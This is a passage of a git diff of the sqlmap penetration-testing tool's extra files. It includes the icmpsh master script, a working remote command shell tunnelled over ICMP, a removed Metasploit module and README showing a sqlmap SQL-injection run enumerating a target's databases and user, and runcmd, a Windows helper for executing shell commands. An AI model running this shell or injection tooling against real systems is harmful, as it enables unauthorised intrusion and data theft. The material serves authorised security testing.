||||||
|
# with the returned data
|
||||||
|
try:
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
|
||||||
|
except socket.error:
|
||||||
|
sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
sock.setblocking(0)
|
||||||
|
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
|
||||||
|
|
||||||
|
# Create a new IP packet and set its source and destination addresses
|
||||||
|
ip = ImpactPacket.IP()
|
||||||
|
ip.set_ip_src(src)
|
||||||
|
ip.set_ip_dst(dst)
|
||||||
|
|
||||||
|
# Create a new ICMP packet of type ECHO REPLY
|
||||||
|
icmp = ImpactPacket.ICMP()
|
||||||
|
icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
|
||||||
|
|
||||||
|
# Instantiate an IP packets decoder
|
||||||
|
decoder = ImpactDecoder.IPDecoder()
|
||||||
|
|
||||||
|
while True:
|
||||||
|
cmd = ''
|
||||||
|
|
||||||
|
# Wait for incoming replies
|
||||||
|
if sock in select.select([ sock ], [], [])[0]:
|
||||||
|
buff = sock.recv(4096)
|
||||||
|
|
||||||
|
if 0 == len(buff):
|
||||||
|
# Socket remotely closed
|
||||||
|
sock.close()
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
# Packet received; decode and display it
|
||||||
|
ippacket = decoder.decode(buff)
|
||||||
|
icmppacket = ippacket.child()
|
||||||
|
|
||||||
|
# If the packet matches, report it to the user
|
||||||
|
if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
|
||||||
|
# Get identifier and sequence number
|
||||||
|
ident = icmppacket.get_icmp_id()
|
||||||
|
seq_id = icmppacket.get_icmp_seq()
|
||||||
|
data = icmppacket.get_data_as_string()
|
||||||
|
|
||||||
|
if len(data) > 0:
|
||||||
|
sys.stdout.write(data)
|
||||||
|
|
||||||
|
# Parse command from standard input
|
||||||
|
try:
|
||||||
|
cmd = sys.stdin.readline()
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if cmd == 'exit\n':
|
||||||
|
return
|
||||||
|
|
||||||
|
# Set sequence number and identifier
|
||||||
|
icmp.set_icmp_id(ident)
|
||||||
|
icmp.set_icmp_seq(seq_id)
|
||||||
|
|
||||||
|
# Include the command as data inside the ICMP packet
|
||||||
|
icmp.contains(ImpactPacket.Data(cmd))
|
||||||
|
|
||||||
|
# Calculate its checksum
|
||||||
|
icmp.set_icmp_cksum(0)
|
||||||
|
icmp.auto_checksum = 1
|
||||||
|
|
||||||
|
# Have the IP packet contain the ICMP packet (along with its payload)
|
||||||
|
ip.contains(icmp)
|
||||||
|
|
||||||
|
# Send it to the target host
|
||||||
|
sock.sendto(ip.get_packet(), (dst, 0))
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
msg = 'missing mandatory options. Execute as root:\n'
|
||||||
|
msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
|
||||||
|
sys.stderr.write(msg)
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
main(sys.argv[1], sys.argv[2])
|
||||||
@@ -1,78 +0,0 @@
|
|||||||
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
|
|
||||||
the example below.
|
|
||||||
|
|
||||||
Note that if you are willing to run Metasploit's sqlmap auxiliary module on
|
|
||||||
through WMAP framework you first need to install sqlmap on your system or
|
|
||||||
add its file system path to the PATH environment variable.
|
|
||||||
|
|
||||||
|
|
||||||
$ ./msfconsole
|
|
||||||
|
|
||||||
_ _ _ _
|
|
||||||
| | | | (_) |
|
|
||||||
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
|
|
||||||
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
|
|
||||||
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|
|
||||||
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
|
|
||||||
| |
|
|
||||||
|_|
|
|
||||||
|
|
||||||
|
|
||||||
=[ msf v3.2-testing
|
|
||||||
+ -- --=[ 308 exploits - 173 payloads
|
|
||||||
+ -- --=[ 20 encoders - 6 nops
|
|
||||||
=[ 75 aux
|
|
||||||
|
|
||||||
msf > use auxiliary/scanner/http/wmap_sqlmap
|
|
||||||
msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
|
|
||||||
RHOSTS => 192.168.1.121
|
|
||||||
msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
|
|
||||||
PATH => /sqlmap/mysql/get_int.php
|
|
||||||
msf auxiliary(wmap_sqlmap) > set QUERY id=1
|
|
||||||
QUERY => id=1
|
|
||||||
msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
|
|
||||||
OPTS => --dbs --current-user
|
|
||||||
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
|
|
||||||
msf auxiliary(wmap_sqlmap) > show options
|
|
||||||
|
|
||||||
Module options:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
BATCH true yes Never ask for user input, use the default behaviour
|
|
||||||
BODY no The data string to be sent through POST
|
|
||||||
METHOD GET yes HTTP Method
|
|
||||||
OPTS --dbs --current-user no The sqlmap options to use
|
|
||||||
PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
|
|
||||||
Proxies no Use a proxy chain
|
|
||||||
QUERY id=1 no HTTP GET query
|
|
||||||
RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
|
|
||||||
RPORT 80 yes The target port
|
|
||||||
SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
|
|
||||||
SSL false no Use SSL
|
|
||||||
THREADS 1 yes The number of concurrent threads
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
msf auxiliary(wmap_sqlmap) > run
|
|
||||||
[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [*] starting at: 16:23:19
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
||||||
SQLMAP: back-end DBMS: MySQL >= 5.0.0
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: current user: 'testuser@localhost'
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: available databases [3]:
|
|
||||||
SQLMAP: [*] information_schema
|
|
||||||
SQLMAP: [*] mysql
|
|
||||||
SQLMAP: [*] test
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [*] shutting down at: 16:23:21
|
|
||||||
SQLMAP:
|
|
||||||
[*] Auxiliary module execution completed
|
|
||||||
msf auxiliary(wmap_sqlmap) >
|
|
||||||
@@ -1,95 +0,0 @@
|
|||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
|
||||||
include Msf::Auxiliary::WMAPScanUniqueQuery
|
|
||||||
include Msf::Auxiliary::Scanner
|
|
||||||
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'SQLMAP SQL Injection External Module',
|
|
||||||
'Description' => %q{
|
|
||||||
This module launch a sqlmap session.
|
|
||||||
sqlmap is an automatic SQL injection tool developed in Python.
|
|
||||||
Its goal is to detect and take advantage of SQL injection
|
|
||||||
vulnerabilities on web applications. Once it detects one
|
|
||||||
or more SQL injections on the target host, the user can
|
|
||||||
choose among a variety of options to perform an extensive
|
|
||||||
back-end database management system fingerprint, retrieve
|
|
||||||
DBMS session user and database, enumerate users, password
|
|
||||||
hashes, privileges, databases, dump entire or user
|
|
||||||
specific DBMS tables/columns, run his own SQL SELECT
|
|
||||||
statement, read specific files on the file system and much
|
|
||||||
more.
|
|
||||||
},
|
|
||||||
'Author' => [ 'bernardo.damele [at] gmail.com', 'daniele.bellucci [at] gmail.com' ],
|
|
||||||
'License' => BSD_LICENSE,
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['URL', 'http://sqlmap.sourceforge.net'],
|
|
||||||
]
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('METHOD', [ true, "HTTP Method", 'GET' ]),
|
|
||||||
OptString.new('PATH', [ true, "The path/file to test for SQL injection", 'index.php' ]),
|
|
||||||
OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
|
|
||||||
OptString.new('BODY', [ false, "The data string to be sent through POST", '' ]),
|
|
||||||
OptString.new('OPTS', [ false, "The sqlmap options to use", ' ' ]),
|
|
||||||
OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]),
|
|
||||||
OptBool.new('BATCH', [ true, "Never ask for user input, use the default behaviour", true ])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Modify to true if you have sqlmap installed.
|
|
||||||
def wmap_enabled
|
|
||||||
false
|
|
||||||
end
|
|
||||||
|
|
||||||
# Test a single host
|
|
||||||
def run_host(ip)
|
|
||||||
|
|
||||||
sqlmap = datastore['SQLMAP_PATH']
|
|
||||||
|
|
||||||
if not sqlmap
|
|
||||||
print_error("The sqlmap script could not be found")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
data = datastore['BODY']
|
|
||||||
method = datastore['METHOD'].upcase
|
|
||||||
|
|
||||||
sqlmap_url = (datastore['SSL'] ? "https" : "http")
|
|
||||||
sqlmap_url += "://" + self.target_host + ":" + datastore['RPORT']
|
|
||||||
sqlmap_url += "/" + datastore['PATH']
|
|
||||||
|
|
||||||
if method == "GET"
|
|
||||||
sqlmap_url += '?' + datastore['QUERY']
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = sqlmap + ' -u \'' + sqlmap_url + '\''
|
|
||||||
cmd += ' --method ' + method
|
|
||||||
cmd += ' ' + datastore['OPTS']
|
|
||||||
|
|
||||||
if not data.empty?
|
|
||||||
cmd += ' --data \'' + data + '\''
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['BATCH'] == true
|
|
||||||
cmd += ' --batch'
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("exec: #{cmd}")
|
|
||||||
IO.popen( cmd ) do |io|
|
|
||||||
io.each_line do |line|
|
|
||||||
print_line("SQLMAP: " + line.strip)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
137
extra/mssqlsig/update.py
Normal file
137
extra/mssqlsig/update.py
Normal file
@@ -0,0 +1,137 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import urllib2
|
||||||
|
import urlparse
|
||||||
|
|
||||||
|
from xml.dom.minidom import Document
|
||||||
|
|
||||||
|
# Path to the XML file with signatures
|
||||||
|
MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
|
||||||
|
|
||||||
|
# Url to update Microsoft SQL Server XML versions file from
|
||||||
|
MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
||||||
|
|
||||||
|
def updateMSSQLXML():
|
||||||
|
if not os.path.exists(MSSQL_XML):
|
||||||
|
errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
|
||||||
|
print errMsg
|
||||||
|
return
|
||||||
|
|
||||||
|
infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
|
||||||
|
print infoMsg
|
||||||
|
|
||||||
|
try:
|
||||||
|
req = urllib2.Request(MSSQL_VERSIONS_URL)
|
||||||
|
f = urllib2.urlopen(req)
|
||||||
|
mssqlVersionsHtmlString = f.read()
|
||||||
|
f.close()
|
||||||
|
except urllib2.URLError:
|
||||||
|
__mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
|
||||||
|
__mssqlHostname = __mssqlPath[1]
|
||||||
|
|
||||||
|
warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
|
||||||
|
warnMsg += " check your Internet connection and retry"
|
||||||
|
print warnMsg
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M)
|
||||||
|
releasesCount = len(releases)
|
||||||
|
|
||||||
|
# Create the minidom document
|
||||||
|
doc = Document()
|
||||||
|
|
||||||
|
# Create the <root> base element
|
||||||
|
root = doc.createElement("root")
|
||||||
|
doc.appendChild(root)
|
||||||
|
|
||||||
|
for index in xrange(0, releasesCount):
|
||||||
|
release = releases[index]
|
||||||
|
|
||||||
|
# Skip Microsoft SQL Server 6.5 because the HTML
|
||||||
|
# table is in another format
|
||||||
|
if release == "6.5":
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Create the <signatures> base element
|
||||||
|
signatures = doc.createElement("signatures")
|
||||||
|
signatures.setAttribute("release", release)
|
||||||
|
root.appendChild(signatures)
|
||||||
|
|
||||||
|
startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
|
||||||
|
|
||||||
|
if index == releasesCount - 1:
|
||||||
|
stopIdx = len(mssqlVersionsHtmlString)
|
||||||
|
else:
|
||||||
|
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
|
||||||
|
|
||||||
|
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
|
||||||
|
servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M)
|
||||||
|
|
||||||
|
for servicePack, version in servicepackVersion:
|
||||||
|
if servicePack.startswith(" "):
|
||||||
|
servicePack = servicePack[1:]
|
||||||
|
if "/" in servicePack:
|
||||||
|
servicePack = servicePack[:servicePack.index("/")]
|
||||||
|
if "(" in servicePack:
|
||||||
|
servicePack = servicePack[:servicePack.index("(")]
|
||||||
|
if "-" in servicePack:
|
||||||
|
servicePack = servicePack[:servicePack.index("-")]
|
||||||
|
if "*" in servicePack:
|
||||||
|
servicePack = servicePack[:servicePack.index("*")]
|
||||||
|
if servicePack.startswith("+"):
|
||||||
|
servicePack = "0%s" % servicePack
|
||||||
|
|
||||||
|
servicePack = servicePack.replace("\t", " ")
|
||||||
|
servicePack = servicePack.replace("No SP", "0")
|
||||||
|
servicePack = servicePack.replace("RTM", "0")
|
||||||
|
servicePack = servicePack.replace("TM", "0")
|
||||||
|
servicePack = servicePack.replace("SP", "")
|
||||||
|
servicePack = servicePack.replace("Service Pack", "")
|
||||||
|
servicePack = servicePack.replace("<a href=\"http:", "")
|
||||||
|
servicePack = servicePack.replace(" ", " ")
|
||||||
|
servicePack = servicePack.replace("+ ", "+")
|
||||||
|
servicePack = servicePack.replace(" +", "+")
|
||||||
|
|
||||||
|
if servicePack.endswith(" "):
|
||||||
|
servicePack = servicePack[:-1]
|
||||||
|
|
||||||
|
if servicePack and version:
|
||||||
|
# Create the main <card> element
|
||||||
|
signature = doc.createElement("signature")
|
||||||
|
signatures.appendChild(signature)
|
||||||
|
|
||||||
|
# Create a <version> element
|
||||||
|
versionElement = doc.createElement("version")
|
||||||
|
signature.appendChild(versionElement)
|
||||||
|
|
||||||
|
# Give the <version> elemenet some text
|
||||||
|
versionText = doc.createTextNode(version)
|
||||||
|
versionElement.appendChild(versionText)
|
||||||
|
|
||||||
|
# Create a <servicepack> element
|
||||||
|
servicepackElement = doc.createElement("servicepack")
|
||||||
|
signature.appendChild(servicepackElement)
|
||||||
|
|
||||||
|
# Give the <servicepack> elemenet some text
|
||||||
|
servicepackText = doc.createTextNode(servicePack)
|
||||||
|
servicepackElement.appendChild(servicepackText)
|
||||||
|
|
||||||
|
# Save our newly created XML to the signatures file
|
||||||
|
mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
|
||||||
|
doc.writexml(writer=mssqlXml, addindent=" ", newl="\n")
|
||||||
|
mssqlXml.close()
|
||||||
|
|
||||||
|
infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
|
||||||
|
print infoMsg
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
updateMSSQLXML()
|
||||||
3
extra/runcmd/README.txt
Normal file
3
extra/runcmd/README.txt
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
Files in this folder can be used to compile auxiliary program that can
|
||||||
|
be used for running command prompt commands skipping standard "cmd /c" way.
|
||||||
|
They are licensed under the terms of the GNU Lesser General Public License.
|
||||||
4
extra/runcmd/windows/README.txt
Normal file
4
extra/runcmd/windows/README.txt
Normal file
@@ -0,0 +1,4 @@
|
|||||||
|
Compile only the Release version because the Runtime library option
|
||||||
|
(Project Properties -> Configuration Properties -> C/C++ -> Code
|
||||||
|
Generation) is set to "Multi-threaded (/MT)", which statically links
|
||||||
|
everything into executable and doesn't compile Debug version at all.
|
||||||
20
extra/runcmd/windows/runcmd.sln
Normal file
20
extra/runcmd/windows/runcmd.sln
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 9.00
|
||||||
|
# Visual Studio 2005
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Win32 = Debug|Win32
|
||||||
|
Release|Win32 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
|
{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
||||||
46
extra/runcmd/windows/runcmd/runcmd.cpp
Normal file
46
extra/runcmd/windows/runcmd/runcmd.cpp
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
/*
|
||||||
|
runcmd - a program for running command prompt commands
|
||||||
|
Copyright (C) 2010 Miroslav Stampar
|
||||||
|
email: miroslav.stampar@gmail.com
|
||||||
|
|
||||||
|
This library is free software; you can redistribute it and/or
|
||||||
|
modify it under the terms of the GNU Lesser General Public
|
||||||
|
License as published by the Free Software Foundation; either
|
||||||
|
version 2.1 of the License, or (at your option) any later version.
|
||||||
|
|
||||||
|
This library is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
Lesser General Public License for more details.
|
||||||
|
|
||||||
|
You should have received a copy of the GNU Lesser General Public
|
||||||
|
License along with this library; if not, write to the Free Software
|
||||||
|
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <windows.h>
|
||||||
|
#include <use_ansi.h>
|
||||||
|
#include "stdafx.h"
|
||||||
|
#include <string>
|
||||||
|
|
||||||
|
using namespace std;
|
||||||
|
int main(int argc, char* argv[])
|
||||||
|
{
|
||||||
|
FILE *fp;
|
||||||
|
string cmd;
|
||||||
|
|
||||||
|
for( int count = 1; count < argc; count++ )
|
||||||
|
cmd += " " + string(argv[count]);
|
||||||
|
|
||||||
|
fp = _popen(cmd.c_str(), "r");
|
||||||
|
|
||||||
|
if (fp != NULL) {
|
||||||
|
char buffer[BUFSIZ];
|
||||||
|
|
||||||
|
while (fgets(buffer, sizeof buffer, fp) != NULL)
|
||||||
|
fputs(buffer, stdout);
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
225
extra/runcmd/windows/runcmd/runcmd.vcproj
Normal file
225
extra/runcmd/windows/runcmd/runcmd.vcproj
Normal file
@@ -0,0 +1,225 @@
|
|||||||
|
<?xml version="1.0" encoding="windows-1250"?>
|
||||||
|
<VisualStudioProject
|
||||||
|
ProjectType="Visual C++"
|
||||||
|
Version="8,00"
|
||||||
|
Name="runcmd"
|
||||||
|
ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
|
||||||
|
RootNamespace="runcmd"
|
||||||
|
Keyword="Win32Proj"
|
||||||
|
>
|
||||||
|
<Platforms>
|
||||||
|
<Platform
|
||||||
|
Name="Win32"
|
||||||
|
/>
|
||||||
|
</Platforms>
|
||||||
|
<ToolFiles>
|
||||||
|
</ToolFiles>
|
||||||
|
<Configurations>
|
||||||
|
<Configuration
|
||||||
|
Name="Debug|Win32"
|
||||||
|
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
||||||
|
IntermediateDirectory="$(ConfigurationName)"
|
||||||
|
ConfigurationType="1"
|
||||||
|
CharacterSet="1"
|
||||||
|
>
|
||||||
|
<Tool
|
||||||
|
Name="VCPreBuildEventTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCCustomBuildTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCXMLDataGeneratorTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCWebServiceProxyGeneratorTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCMIDLTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCCLCompilerTool"
|
||||||
|
Optimization="0"
|
||||||
|
PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
|
||||||
|
MinimalRebuild="true"
|
||||||
|
BasicRuntimeChecks="3"
|
||||||
|
RuntimeLibrary="0"
|
||||||
|
UsePrecompiledHeader="2"
|
||||||
|
WarningLevel="3"
|
||||||
|
Detect64BitPortabilityProblems="true"
|
||||||
|
DebugInformationFormat="4"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCManagedResourceCompilerTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCResourceCompilerTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCPreLinkEventTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCLinkerTool"
|
||||||
|
LinkIncremental="2"
|
||||||
|
GenerateDebugInformation="true"
|
||||||
|
SubSystem="1"
|
||||||
|
TargetMachine="1"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCALinkTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCManifestTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCXDCMakeTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCBscMakeTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCFxCopTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCAppVerifierTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCWebDeploymentTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCPostBuildEventTool"
|
||||||
|
/>
|
||||||
|
</Configuration>
|
||||||
|
<Configuration
|
||||||
|
Name="Release|Win32"
|
||||||
|
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
||||||
|
IntermediateDirectory="$(ConfigurationName)"
|
||||||
|
ConfigurationType="1"
|
||||||
|
CharacterSet="1"
|
||||||
|
WholeProgramOptimization="1"
|
||||||
|
>
|
||||||
|
<Tool
|
||||||
|
Name="VCPreBuildEventTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCCustomBuildTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCXMLDataGeneratorTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCWebServiceProxyGeneratorTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCMIDLTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCCLCompilerTool"
|
||||||
|
PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
|
||||||
|
RuntimeLibrary="0"
|
||||||
|
UsePrecompiledHeader="2"
|
||||||
|
WarningLevel="3"
|
||||||
|
Detect64BitPortabilityProblems="true"
|
||||||
|
DebugInformationFormat="3"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCManagedResourceCompilerTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCResourceCompilerTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCPreLinkEventTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCLinkerTool"
|
||||||
|
LinkIncremental="1"
|
||||||
|
GenerateDebugInformation="true"
|
||||||
|
SubSystem="1"
|
||||||
|
OptimizeReferences="2"
|
||||||
|
EnableCOMDATFolding="2"
|
||||||
|
TargetMachine="1"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCALinkTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCManifestTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCXDCMakeTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCBscMakeTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCFxCopTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCAppVerifierTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCWebDeploymentTool"
|
||||||
|
/>
|
||||||
|
<Tool
|
||||||
|
Name="VCPostBuildEventTool"
|
||||||
|
/>
|
||||||
|
</Configuration>
|
||||||
|
</Configurations>
|
||||||
|
<References>
|
||||||
|
</References>
|
||||||
|
<Files>
|
||||||
|
<Filter
|
||||||
|
Name="Source Files"
|
||||||
|
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
|
||||||
|
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
|
||||||
|
>
|
||||||
|
<File
|
||||||
|
RelativePath=".\runcmd.cpp"
|
||||||
|
>
|
||||||
|
</File>
|
||||||
|
<File
|
||||||
|
RelativePath=".\stdafx.cpp"
|
||||||
|
>
|
||||||
|
<FileConfiguration
|
||||||
|
Name="Debug|Win32"
|
||||||
|
>
|
||||||
|
<Tool
|
||||||
|
Name="VCCLCompilerTool"
|
||||||
|
UsePrecompiledHeader="1"
|
||||||
|
/>
|
||||||
|
</FileConfiguration>
|
||||||
|
<FileConfiguration
|
||||||
|
Name="Release|Win32"
|
||||||
|
>
|
||||||
|
<Tool
|
||||||
|
Name="VCCLCompilerTool"
|
||||||
|
UsePrecompiledHeader="1"
|
||||||
|
/>
|
||||||
|
</FileConfiguration>
|
||||||
|
</File>
|
||||||
|
</Filter>
|
||||||
|
<Filter
|
||||||
|
Name="Header Files"
|
||||||
|
Filter="h;hpp;hxx;hm;inl;inc;xsd"
|
||||||
|
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
|
||||||
|
>
|
||||||
|
<File
|
||||||
|
RelativePath=".\stdafx.h"
|
||||||
|
>
|
||||||
|
</File>
|
||||||
|
</Filter>
|
||||||
|
<Filter
|
||||||
|
Name="Resource Files"
|
||||||
|
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
|
||||||
|
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
|
||||||
|
>
|
||||||
|
</Filter>
|
||||||
|
<File
|
||||||
|
RelativePath=".\ReadMe.txt"
|
||||||
|
>
|
||||||
|
</File>
|
||||||
|
</Files>
|
||||||
|
<Globals>
|
||||||
|
</Globals>
|
||||||
|
</VisualStudioProject>
|
||||||
8
extra/runcmd/windows/runcmd/stdafx.cpp
Normal file
8
extra/runcmd/windows/runcmd/stdafx.cpp
Normal file
